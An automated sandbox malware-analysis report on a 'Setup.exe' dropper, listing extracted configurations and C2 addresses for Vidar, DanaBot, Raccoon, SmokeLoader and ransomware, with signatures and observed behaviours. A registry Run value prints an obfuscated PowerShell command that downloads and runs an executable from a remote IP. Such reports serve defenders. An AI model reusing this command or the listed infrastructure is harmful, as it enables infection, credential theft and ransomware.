Resubmissions
04-06-2023 21:35
230604-1fcwgadg89 1013-02-2022 03:16
220213-dsq8asfbej 1013-02-2022 03:12
220213-dqagrsdda9 1013-02-2022 03:11
220213-dpxwnsfbdq 106-12-2021 20:39
211206-zflypsfahr 1019-10-2021 03:48
211019-ec1mgafbf7 1011-08-2021 05:28
210811-rjsxfvjxd2 1011-08-2021 05:07
210811-rs31ylg4ls 1011-08-2021 04:56
210811-tvaldfm4jx 10Analysis
-
max time kernel
293s -
max time network
1168s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
11-08-2021 05:28
Static task
static1
Behavioral task
behavioral1
Sample
Setup.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Setup.exe
Resource
win10v20210410
Errors
General
-
Target
Setup.exe
-
Size
1.6MB
-
MD5
ce6eaa52767b2df78b34519231966588
-
SHA1
ab32d09951189022a1a39e9204ec9ce2926b3fcf
-
SHA256
40924781ba072ea88bd7cad3f6d2a48e87f370e1c1ee334a3415dd26b5ea17e5
-
SHA512
36a09fe704823d6db5d0982d761ba1976c940b82b7c1ca650627d66e16b420612b78c761f2ed00e533453eeb2dd7e431cf47b0c2cf826354aa6e779fda531067
Malware Config
Extracted
http://91.241.19.52/Api/GetFile2
Extracted
C:\_readme.txt
manager@mailtemp.ch
managerhelper@airmail.cc
https://we.tl/t-jTbSQT8ApY
Extracted
vidar
40
921
https://lenak513.tumblr.com/
-
profile_id
921
Extracted
vidar
40
937
https://lenak513.tumblr.com/
-
profile_id
937
Extracted
danabot
142.11.244.124:443
142.11.206.50:443
-
embedded_hash
6AD9FE4F9E491E785665E0D144F61DAB
Extracted
metasploit
windows/single_exec
Extracted
raccoon
c8a4bc819c641415a3c45622368953a684036cdb
-
url4cnc
https://telete.in/jjbadb0y
Extracted
smokeloader
2020
http://aucmoney.com/upload/
http://thegymmum.com/upload/
http://atvcampingtrips.com/upload/
http://kuapakualaman.com/upload/
http://renatazarazua.com/upload/
http://nasufmutlu.com/upload/
Signatures
-
Danabot Loader Component 4 IoCs
Processes:
resource yara_rule \Users\Admin\DOCUME~1\EXYNYN~1.TMP DanabotLoader2021 \Users\Admin\DOCUME~1\EXYNYN~1.TMP DanabotLoader2021 behavioral2/memory/5536-336-0x0000000000BA0000-0x0000000000CFE000-memory.dmp DanabotLoader2021 C:\Users\Admin\DOCUME~1\EXYNYN~1.TMP DanabotLoader2021 -
Glupteba Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4500-366-0x0000000003F60000-0x0000000004886000-memory.dmp family_glupteba behavioral2/memory/4500-374-0x0000000000400000-0x0000000003724000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerUNdlL32.eXerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7008 5244 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6440 5244 rUNdlL32.eXe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7340 5244 rundll32.exe -
Raccoon Stealer Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/6028-378-0x0000000000BD0000-0x0000000000C63000-memory.dmp family_raccoon behavioral2/memory/6028-379-0x0000000000400000-0x0000000000945000-memory.dmp family_raccoon -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\Documents\XIx2rmM8cnakuvCSq1U4Vd9g.exe family_redline C:\Users\Admin\Documents\XIx2rmM8cnakuvCSq1U4Vd9g.exe family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 5976 created 4192 5976 WerFault.exe rz4AiugRidB8wYjvgfxacrAz.exe PID 5604 created 4320 5604 WerFault.exe uUF0atfnNdd21kTnNYUAhIyj.exe PID 6924 created 7960 6924 WerFault.exe ufgaa.exe -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
suricata: ET MALWARE GCleaner Downloader Activity M1
suricata: ET MALWARE GCleaner Downloader Activity M1
-
suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
-
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
-
suricata: ET MALWARE Possible Dridex Download URI Struct with no referer
suricata: ET MALWARE Possible Dridex Download URI Struct with no referer
-
suricata: ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
suricata: ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
-
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Nirsoft 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\b79de8f8-c625-4e13-81cf-f519955346b0\AdvancedRun.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\b79de8f8-c625-4e13-81cf-f519955346b0\AdvancedRun.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\b79de8f8-c625-4e13-81cf-f519955346b0\AdvancedRun.exe Nirsoft -
Vidar Stealer 5 IoCs
Processes:
resource yara_rule behavioral2/memory/2736-244-0x0000000000400000-0x00000000004A1000-memory.dmp family_vidar behavioral2/memory/2736-246-0x000000000046B77D-mapping.dmp family_vidar behavioral2/memory/2736-256-0x0000000000400000-0x00000000004A1000-memory.dmp family_vidar behavioral2/memory/4192-350-0x0000000000400000-0x000000000334A000-memory.dmp family_vidar behavioral2/memory/4192-332-0x00000000033B0000-0x000000000345E000-memory.dmp family_vidar -
Blocklisted process makes network request 64 IoCs
Processes:
powershell.exerundll32.exeRUNDLL32.EXEflow pid process 290 5392 powershell.exe 367 5536 rundll32.exe 443 4436 RUNDLL32.EXE 448 4436 RUNDLL32.EXE 450 4436 RUNDLL32.EXE 451 4436 RUNDLL32.EXE 453 4436 RUNDLL32.EXE 455 4436 RUNDLL32.EXE 456 4436 RUNDLL32.EXE 459 4436 RUNDLL32.EXE 461 4436 RUNDLL32.EXE 463 4436 RUNDLL32.EXE 464 4436 RUNDLL32.EXE 467 4436 RUNDLL32.EXE 469 4436 RUNDLL32.EXE 471 4436 RUNDLL32.EXE 472 4436 RUNDLL32.EXE 473 4436 RUNDLL32.EXE 474 4436 RUNDLL32.EXE 475 4436 RUNDLL32.EXE 477 4436 RUNDLL32.EXE 478 4436 RUNDLL32.EXE 479 4436 RUNDLL32.EXE 480 4436 RUNDLL32.EXE 481 4436 RUNDLL32.EXE 483 4436 RUNDLL32.EXE 484 4436 RUNDLL32.EXE 485 4436 RUNDLL32.EXE 486 4436 RUNDLL32.EXE 487 4436 RUNDLL32.EXE 488 4436 RUNDLL32.EXE 489 4436 RUNDLL32.EXE 491 4436 RUNDLL32.EXE 493 4436 RUNDLL32.EXE 495 4436 RUNDLL32.EXE 496 4436 RUNDLL32.EXE 497 4436 RUNDLL32.EXE 498 4436 RUNDLL32.EXE 499 4436 RUNDLL32.EXE 500 4436 RUNDLL32.EXE 501 4436 RUNDLL32.EXE 502 4436 RUNDLL32.EXE 503 4436 RUNDLL32.EXE 504 4436 RUNDLL32.EXE 505 4436 RUNDLL32.EXE 506 4436 RUNDLL32.EXE 509 4436 RUNDLL32.EXE 510 4436 RUNDLL32.EXE 512 4436 RUNDLL32.EXE 513 4436 RUNDLL32.EXE 514 4436 RUNDLL32.EXE 515 4436 RUNDLL32.EXE 516 4436 RUNDLL32.EXE 517 4436 RUNDLL32.EXE 518 4436 RUNDLL32.EXE 519 4436 RUNDLL32.EXE 520 4436 RUNDLL32.EXE 521 4436 RUNDLL32.EXE 522 4436 RUNDLL32.EXE 523 4436 RUNDLL32.EXE 524 4436 RUNDLL32.EXE 525 4436 RUNDLL32.EXE 526 4436 RUNDLL32.EXE 527 4436 RUNDLL32.EXE -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
WnyJD1JNbEGRSLlBiKgWSQPQ.exeDaldoula.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts WnyJD1JNbEGRSLlBiKgWSQPQ.exe File opened for modification C:\Windows\system32\drivers\etc\hosts Daldoula.exe -
Executes dropped EXE 64 IoCs
Processes:
B0B4AHrsgxA7Nt6vDYP9D9LZ.exenZTAvaJJHiZt8CpVom0PFy_o.exeWnyJD1JNbEGRSLlBiKgWSQPQ.exeuUF0atfnNdd21kTnNYUAhIyj.exe8DqmS760nYTlpJGdjx0JPYJa.exejfiag3g_gg.exejQOjjWaHpikcE8hMJLCCcd7V.exegYQ2xLKgMc9lQ4OLbLxZeBiq.exeRuntimebroker.exeFOlaPszW2GVODMR3ezIbHQJx.exepiASTjGis5c5nGd58zBj9dtn.exeSapete.exe.com27kSZAfpnLjWG5bu37BpjxfH.exeE6GanK2kLUrxGIsqkEGCRlzq.exeAdvancedRun.exejPLO2J1s8JxaX_4Pr3O7UENC.exe24EijN8ARjd6ySPoevmYqMMj.exeIgbKRtaNjqRQpLw8QuOXvnvo.exeay5bW_VFzsOfZRDXJ5WpBM3j.exerz4AiugRidB8wYjvgfxacrAz.exeXIx2rmM8cnakuvCSq1U4Vd9g.exenZTAvaJJHiZt8CpVom0PFy_o.exeDJCJOECZVtp5ltvQQsObO2H9.exeDJCJOECZVtp5ltvQQsObO2H9.tmpcustomer3.exeAdvancedRun.exemd8_8eus.exejooyu.exeExynYnCJF8bxFManXGVWUTlU.exeE6GanK2kLUrxGIsqkEGCRlzq.exeB0B4AHrsgxA7Nt6vDYP9D9LZ.exeMicrosoftEdgeCP.exe4963167.exe1063322.exetmpE7A6_tmp.exe11111.exe1761590.exe6202460.exeSetup.exemstsca.exeGameBoxWin64.exeGameBoxWin32.tmpWeather Installation.exeGameBox.exeGameBox32Bit.exeBotCheck.exewinsetupcom.exe11111.exenote8876.exeGameBoxWin32.exeultramediaburner.exe11111.exe11111.exeWerFault.exeBotCheck.exechrome.exefirefox.exeConhost.exe8360116.exe5463260.exe1197537.exe8054769.exepid process 4312 B0B4AHrsgxA7Nt6vDYP9D9LZ.exe 4344 nZTAvaJJHiZt8CpVom0PFy_o.exe 4336 WnyJD1JNbEGRSLlBiKgWSQPQ.exe 4320 uUF0atfnNdd21kTnNYUAhIyj.exe 4372 8DqmS760nYTlpJGdjx0JPYJa.exe 4328 jfiag3g_gg.exe 4396 jQOjjWaHpikcE8hMJLCCcd7V.exe 4384 gYQ2xLKgMc9lQ4OLbLxZeBiq.exe 4940 Runtimebroker.exe 5104 FOlaPszW2GVODMR3ezIbHQJx.exe 4360 piASTjGis5c5nGd58zBj9dtn.exe 2152 Sapete.exe.com 2816 27kSZAfpnLjWG5bu37BpjxfH.exe 2200 E6GanK2kLUrxGIsqkEGCRlzq.exe 3788 AdvancedRun.exe 4672 jPLO2J1s8JxaX_4Pr3O7UENC.exe 4716 24EijN8ARjd6ySPoevmYqMMj.exe 4500 IgbKRtaNjqRQpLw8QuOXvnvo.exe 4876 ay5bW_VFzsOfZRDXJ5WpBM3j.exe 4192 rz4AiugRidB8wYjvgfxacrAz.exe 4936 XIx2rmM8cnakuvCSq1U4Vd9g.exe 2736 nZTAvaJJHiZt8CpVom0PFy_o.exe 3852 DJCJOECZVtp5ltvQQsObO2H9.exe 4640 DJCJOECZVtp5ltvQQsObO2H9.tmp 4468 customer3.exe 2344 AdvancedRun.exe 5044 md8_8eus.exe 4600 jooyu.exe 4720 ExynYnCJF8bxFManXGVWUTlU.exe 5548 E6GanK2kLUrxGIsqkEGCRlzq.exe 5732 B0B4AHrsgxA7Nt6vDYP9D9LZ.exe 6028 MicrosoftEdgeCP.exe 2984 4963167.exe 5436 1063322.exe 2576 tmpE7A6_tmp.exe 5220 11111.exe 5844 1761590.exe 6008 6202460.exe 804 Setup.exe 6112 mstsca.exe 4328 jfiag3g_gg.exe 5804 GameBoxWin64.exe 6012 GameBoxWin32.tmp 4684 Weather Installation.exe 5292 GameBox.exe 4952 GameBox32Bit.exe 4128 BotCheck.exe 5212 winsetupcom.exe 6108 11111.exe 4536 note8876.exe 6120 GameBoxWin32.exe 5096 ultramediaburner.exe 6012 GameBoxWin32.tmp 5148 11111.exe 5600 11111.exe 4180 WerFault.exe 5204 BotCheck.exe 6312 chrome.exe 6388 firefox.exe 6432 Conhost.exe 6608 8360116.exe 6620 5463260.exe 6628 1197537.exe 6668 8054769.exe -
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
E92.exedescription ioc process File renamed C:\Users\Admin\Pictures\ExportBlock.raw => C:\Users\Admin\Pictures\ExportBlock.raw.reqg E92.exe File renamed C:\Users\Admin\Pictures\SelectUnpublish.crw => C:\Users\Admin\Pictures\SelectUnpublish.crw.reqg E92.exe -
Processes:
resource yara_rule C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe vmprotect behavioral2/memory/5044-292-0x0000000000400000-0x000000000067D000-memory.dmp vmprotect C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe vmprotect -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
jPLO2J1s8JxaX_4Pr3O7UENC.exewinsetupcom.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion jPLO2J1s8JxaX_4Pr3O7UENC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion jPLO2J1s8JxaX_4Pr3O7UENC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion winsetupcom.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion winsetupcom.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Setup.exeLokajafaha.execmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Setup.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Lokajafaha.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation cmd.exe -
Drops startup file 4 IoCs
Processes:
Runtimebroker.exewinsetupcom.execustomer3.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url winsetupcom.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe customer3.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe customer3.exe -
Loads dropped DLL 40 IoCs
Processes:
DJCJOECZVtp5ltvQQsObO2H9.tmprundll32.exeGameBoxWin64.exeWeather Installation.exeGameBoxWin32.tmpMicrosoftEdgeCP.exeE92.exeSapete.exe.comMsiExec.exeMsiExec.exeRUNDLL32.EXEConhost.exerundll32.exebuild2.exeRUNDLL32.EXErundll32.exepid process 4640 DJCJOECZVtp5ltvQQsObO2H9.tmp 4640 DJCJOECZVtp5ltvQQsObO2H9.tmp 5536 rundll32.exe 5536 rundll32.exe 5804 GameBoxWin64.exe 5804 GameBoxWin64.exe 4684 Weather Installation.exe 6012 GameBoxWin32.tmp 6028 MicrosoftEdgeCP.exe 6028 MicrosoftEdgeCP.exe 6028 MicrosoftEdgeCP.exe 6028 MicrosoftEdgeCP.exe 6028 MicrosoftEdgeCP.exe 6420 E92.exe 4868 Sapete.exe.com 5804 GameBoxWin64.exe 5492 MsiExec.exe 5492 MsiExec.exe 6440 MsiExec.exe 6440 MsiExec.exe 6440 MsiExec.exe 4436 RUNDLL32.EXE 4436 RUNDLL32.EXE 2928 Conhost.exe 2928 Conhost.exe 2928 Conhost.exe 2928 Conhost.exe 2928 Conhost.exe 2928 Conhost.exe 2928 Conhost.exe 2928 Conhost.exe 2928 Conhost.exe 7780 rundll32.exe 7780 rundll32.exe 2928 Conhost.exe 7768 build2.exe 7768 build2.exe 8096 RUNDLL32.EXE 8096 RUNDLL32.EXE 4712 rundll32.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Documents\jPLO2J1s8JxaX_4Pr3O7UENC.exe themida C:\Users\Admin\Documents\jPLO2J1s8JxaX_4Pr3O7UENC.exe themida behavioral2/memory/4672-282-0x0000000000F90000-0x0000000000F91000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
Processes:
CHLbrowser.exepowershell.exewinsetupcom.exe5463260.exeE92.exeDaldoula.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce CHLbrowser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" CHLbrowser.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.2'+'41'+'.19.5'+'2/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\winsetupcom.exe" winsetupcom.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 5463260.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\c87fca11-df42-4068-9725-e8952d115011\\E92.exe\" --AutoStart" E92.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\GameBox INC\\ZHolaqubipae.exe\"" Daldoula.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
md8_8eus.exenote8876.exejPLO2J1s8JxaX_4Pr3O7UENC.exewinsetupcom.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA note8876.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jPLO2J1s8JxaX_4Pr3O7UENC.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA winsetupcom.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exeWeather Installation.exeGameBoxWin64.exedescription ioc process File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: Weather Installation.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: Weather Installation.exe File opened (read-only) \??\R: Weather Installation.exe File opened (read-only) \??\X: Weather Installation.exe File opened (read-only) \??\F: GameBoxWin64.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\M: Weather Installation.exe File opened (read-only) \??\T: GameBoxWin64.exe File opened (read-only) \??\V: GameBoxWin64.exe File opened (read-only) \??\V: Weather Installation.exe File opened (read-only) \??\S: GameBoxWin64.exe File opened (read-only) \??\I: Weather Installation.exe File opened (read-only) \??\W: GameBoxWin64.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: Weather Installation.exe File opened (read-only) \??\B: GameBoxWin64.exe File opened (read-only) \??\U: GameBoxWin64.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Q: Weather Installation.exe File opened (read-only) \??\O: GameBoxWin64.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Y: GameBoxWin64.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\K: GameBoxWin64.exe File opened (read-only) \??\Q: GameBoxWin64.exe File opened (read-only) \??\H: Weather Installation.exe File opened (read-only) \??\O: Weather Installation.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\B: Weather Installation.exe File opened (read-only) \??\F: Weather Installation.exe File opened (read-only) \??\J: Weather Installation.exe File opened (read-only) \??\T: Weather Installation.exe File opened (read-only) \??\E: GameBoxWin64.exe File opened (read-only) \??\G: GameBoxWin64.exe File opened (read-only) \??\N: GameBoxWin64.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\P: Weather Installation.exe File opened (read-only) \??\W: Weather Installation.exe File opened (read-only) \??\I: GameBoxWin64.exe File opened (read-only) \??\L: GameBoxWin64.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\G: Weather Installation.exe File opened (read-only) \??\N: Weather Installation.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: GameBoxWin64.exe File opened (read-only) \??\E: Weather Installation.exe File opened (read-only) \??\A: GameBoxWin64.exe File opened (read-only) \??\P: GameBoxWin64.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: Weather Installation.exe File opened (read-only) \??\X: GameBoxWin64.exe File opened (read-only) \??\Z: GameBoxWin64.exe File opened (read-only) \??\A: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 15 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 226 ipinfo.io 238 freegeoip.app 1472 api.2ip.ua 65 ipinfo.io 222 ipinfo.io 426 ip-api.com 66 ipinfo.io 373 api.2ip.ua 227 freegeoip.app 240 ip-api.com 374 api.2ip.ua 1471 api.2ip.ua 1492 ip-api.com 221 freegeoip.app 224 freegeoip.app -
Program crash 22 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process 5800 4716 WerFault.exe 6088 4716 WerFault.exe 4880 4716 WerFault.exe 352 4716 WerFault.exe 4144 2736 WerFault.exe nZTAvaJJHiZt8CpVom0PFy_o.exe 4388 4716 WerFault.exe 24EijN8ARjd6ySPoevmYqMMj.exe 5652 4716 WerFault.exe 24EijN8ARjd6ySPoevmYqMMj.exe 5736 4716 WerFault.exe 24EijN8ARjd6ySPoevmYqMMj.exe 4180 4716 WerFault.exe 24EijN8ARjd6ySPoevmYqMMj.exe 5604 4320 WerFault.exe uUF0atfnNdd21kTnNYUAhIyj.exe 5976 4192 WerFault.exe rz4AiugRidB8wYjvgfxacrAz.exe 5156 8028 WerFault.exe MicrosoftEdge.exe 6924 7960 WerFault.exe ufgaa.exe 4396 2984 WerFault.exe 4963167.exe 8760 5844 WerFault.exe 1761590.exe 5188 6608 WerFault.exe 8360116.exe 4916 7896 WerFault.exe 6345772.exe 1208 7280 WerFault.exe svchost.exe 6284 8732 WerFault.exe svchost.exe 5268 7100 WerFault.exe svchost.exe 4192 8308 WerFault.exe svchost.exe 6776 8764 WerFault.exe svchost.exe -
Drops file in System32 directory 6 IoCs
Processes:
svchost.exesvchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\System32\Tasks\Time Trigger Task svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\System32\Tasks\Azure-Update-Task svchost.exe File opened for modification C:\Windows\System32\Tasks\services64 svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
jPLO2J1s8JxaX_4Pr3O7UENC.exewinsetupcom.exepid process 4672 jPLO2J1s8JxaX_4Pr3O7UENC.exe 5212 winsetupcom.exe -
Suspicious use of SetThreadContext 11 IoCs
Processes:
nZTAvaJJHiZt8CpVom0PFy_o.exesvchost.exeE92.exeschtasks.exeRUNDLL32.EXEbuild3.exebuild2.exeWnyJD1JNbEGRSLlBiKgWSQPQ.exe1cr.exedescription pid process target process PID 4344 set thread context of 2736 4344 nZTAvaJJHiZt8CpVom0PFy_o.exe nZTAvaJJHiZt8CpVom0PFy_o.exe PID 4312 set thread context of 5732 4312 B0B4AHrsgxA7Nt6vDYP9D9LZ.exe PID 3508 set thread context of 2772 3508 svchost.exe svchost.exe PID 6348 set thread context of 6420 6348 E92.exe E92.exe PID 3508 set thread context of 6480 3508 svchost.exe svchost.exe PID 5272 set thread context of 3972 5272 schtasks.exe E92.exe PID 4436 set thread context of 6204 4436 RUNDLL32.EXE rundll32.exe PID 7868 set thread context of 8008 7868 build3.exe build3.exe PID 7536 set thread context of 7768 7536 build2.exe build2.exe PID 4336 set thread context of 6244 4336 WnyJD1JNbEGRSLlBiKgWSQPQ.exe WnyJD1JNbEGRSLlBiKgWSQPQ.exe PID 7552 set thread context of 7716 7552 1cr.exe 1cr.exe -
Drops file in Program Files directory 39 IoCs
Processes:
Setup.exemd8_8eus.exenote8876.exeDaldoula.exeWnyJD1JNbEGRSLlBiKgWSQPQ.exeay5bW_VFzsOfZRDXJ5WpBM3j.exeultramediaburner.tmprundll32.exedescription ioc process File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe Setup.exe File created C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File created C:\Program Files (x86)\GameBox INC\GameBox\tmp.edb note8876.exe File created C:\Program Files (x86)\GameBox INC\ZHolaqubipae.exe.config Daldoula.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW md8_8eus.exe File created C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe File created C:\Program Files (x86)\GameBox INC\GameBox\d note8876.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\d note8876.exe File created C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\d.INTEG.RAW note8876.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\d.jfm note8876.exe File created C:\Program Files\Windows Media Player\IYNSOJCJPA\ultramediaburner.exe.config Daldoula.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\resources.pak WnyJD1JNbEGRSLlBiKgWSQPQ.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe ay5bW_VFzsOfZRDXJ5WpBM3j.exe File created C:\Program Files\Windows Media Player\IYNSOJCJPA\ultramediaburner.exe Daldoula.exe File created C:\Program Files\Mozilla Firefox\DotNetZip-l05k5psa.tmp WnyJD1JNbEGRSLlBiKgWSQPQ.exe File created C:\Program Files (x86)\Company\NewProduct\tmp.edb md8_8eus.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-V0HSP.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat 